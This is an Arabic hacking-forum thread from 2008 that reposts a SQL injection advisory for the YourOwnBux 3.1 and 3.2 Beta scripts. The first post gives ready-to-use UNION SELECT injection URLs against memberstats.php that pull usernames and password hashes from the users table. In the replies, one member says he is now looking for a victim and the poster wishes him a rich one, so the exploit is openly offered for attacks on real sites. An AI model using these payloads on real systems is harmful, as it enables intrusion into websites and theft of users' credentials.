ضع اعلانك هنا

ضع اعلانك هنا ضع اعلانك هنا منتديات بوابة الاسلام
التاريخ 2008-8-13 التاريخ 2008-8-15 ضع اعلانك هنا ضع اعلانك هنا
 
العودة   عالم المعرفة > قسم الأنظمة والسيرفرات > مكتبة الثغرات
تفعيل العضوية استرجاع كلمة المرور شروط المنتــدى البحث مشاركات اليوم اجعل كافة الأقسام مقروءة
مكتبة الثغرات ثغرات المواقع , ثغرات المنتديات ثغرات الأنظمة ثغرات مجلات , ثغرات البرامج و كيفية الاستغلال ,windows, linux, freebsd, DoS, Kernel, Local, buffer, overflow, auditing, spoofing, sniffer, sniffing, vulnerability, exploit
 

YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

مكتبة الثغرات


إضافة رد
 
LinkBack أدوات الموضوع
 
قديم 08-28-2008, 08:33 AM   #1 (permalink)
عضو نشيط






alh000t غير متصل

alh000t will become famous soon enoughalh000t will become famous soon enough

m3ic9 YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: YourOwnBux
Version: 3.1, 3.2
Price: $39.99
DEMO: yourownbux.com/demos/
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

3.2 Beta version

Exploit:

كود:
http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/*
3.1 version

Exploit:

كود:
http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/*

معلومات

http://milw0rm.com/exploits/6321

التوقيع

 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 08-28-2008, 09:02 AM   #2 (permalink)
عضو مميز
 
الصورة الرمزية ابو تيله







ابو تيله غير متصل

ابو تيله has a spectacular aura aboutابو تيله has a spectacular aura about

افتراضي رد: YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

يسلمو اخوي على الثغره جاري البحث عن ضحيه
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 08-28-2008, 10:02 AM   #3 (permalink)
عضو نشيط






alh000t غير متصل

alh000t will become famous soon enoughalh000t will become famous soon enough

افتراضي رد: YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

اقتباس:
المشاركة الأصلية كتبت بواسطة ابو تيله
   يسلمو اخوي على الثغره جاري البحث عن ضحيه


الله يسلمكـ اخوي بتوفقكـ ان شاء الله تحصلك ضحيهـ دسمهـ

التوقيع

 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 08-28-2008, 08:48 PM   #4 (permalink)
عضو نشيط






عوجان غير متصل

عوجان will become famous soon enoughعوجان will become famous soon enough

افتراضي رد: YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

مشكور على الثغرة
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 08-28-2008, 08:58 PM   #5 (permalink)
عضو نشيط






alh000t غير متصل

alh000t will become famous soon enoughalh000t will become famous soon enough

افتراضي رد: YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

اقتباس:
المشاركة الأصلية كتبت بواسطة عوجان
   مشكور على الثغرة

لا شكر على واجب اسعدني مروركـ

التوقيع

 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
إضافة رد





الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
BBlog 0.7.6 (mod) Remote SQL Injection Vulnerability AnGeR_HacKeR مكتبة الثغرات 1 08-28-2008 01:42 AM
Ovidentia 6.6.5 (item) Remote SQL Injection Vulnerability AnGeR_HacKeR مكتبة الثغرات 1 08-28-2008 01:41 AM
Banner Management Script (tr.php id) Remote SQL Injection Vulnerability Qtr Linux مكتبة الثغرات 2 08-27-2008 09:02 PM
Active PHP Bookmarks 1.1.02 Remote SQL Injection Vulnerability Qtr Linux مكتبة الثغرات 2 08-22-2008 06:23 AM
phpBazar 2.0.2 (adid) Remote SQL Injection Vulnerability Qtr Linux مكتبة الثغرات 1 08-22-2008 06:21 AM


الساعة الآن 04:18 PM.

عدد الكلمات الدلالية 70 الاكثر بحث في الموقع
الكلمات الدلالية
اخبار ادوات اطفال الاستثمار البرفست البيزون الدروس الروافض السعوديه السنه الشيعه العاب الفلاش الفوتو شوب الكويت المجوس المهدي الهكر ايران برامج برامج اختراق برامج هكر بنات تحميل تشفير تشقير الصفحات تطوير تعليم ثغره جرائم جوال حماية حوار دروس دومين رواتر شرح صميم صوره فضائح فيديو كتاب كراك كمبيوتر محاضرات منتدى مودم نطاق نطاقات نوكيا هوز bifrost buffer crypter domain downloader exploit file inclusion iran local overflow poison python server shellcode sql injection trojan version vulnerability youtube


روابط مهمة

أقسام المنتدى


الرسول الإنسان | الدفاع عن أهل السنة | فضائح و جرائم الروافض | السنه | الحوارات الهادفة | الفلاش والسويتش | الفوتوشوب | دورة الفوتوشوب | صور | العاب | البرامج المشروحه | الفرفشه والمرح | الرياضة | الفايروسات | الهاردوير والصيانة | تطوير المنتديات والمواقع | دورة تطوير منتديات vb | الحمايه | اختراق المواقع والسيرفرات | هكرز | اختراق الشات والاميل | ثغرات | البرامج | الفيجوال بيسك | المواضيع العامه | القصص واللغات|  شات


Powered by vBulletin Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd
لا تتحمل إدارة منتديات عالم المعرفة أية مسؤولية حول أي موضوع يطرح في المنتدى فإن المكتوب يعبر عن رأى صاحبه أو ناقلة

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58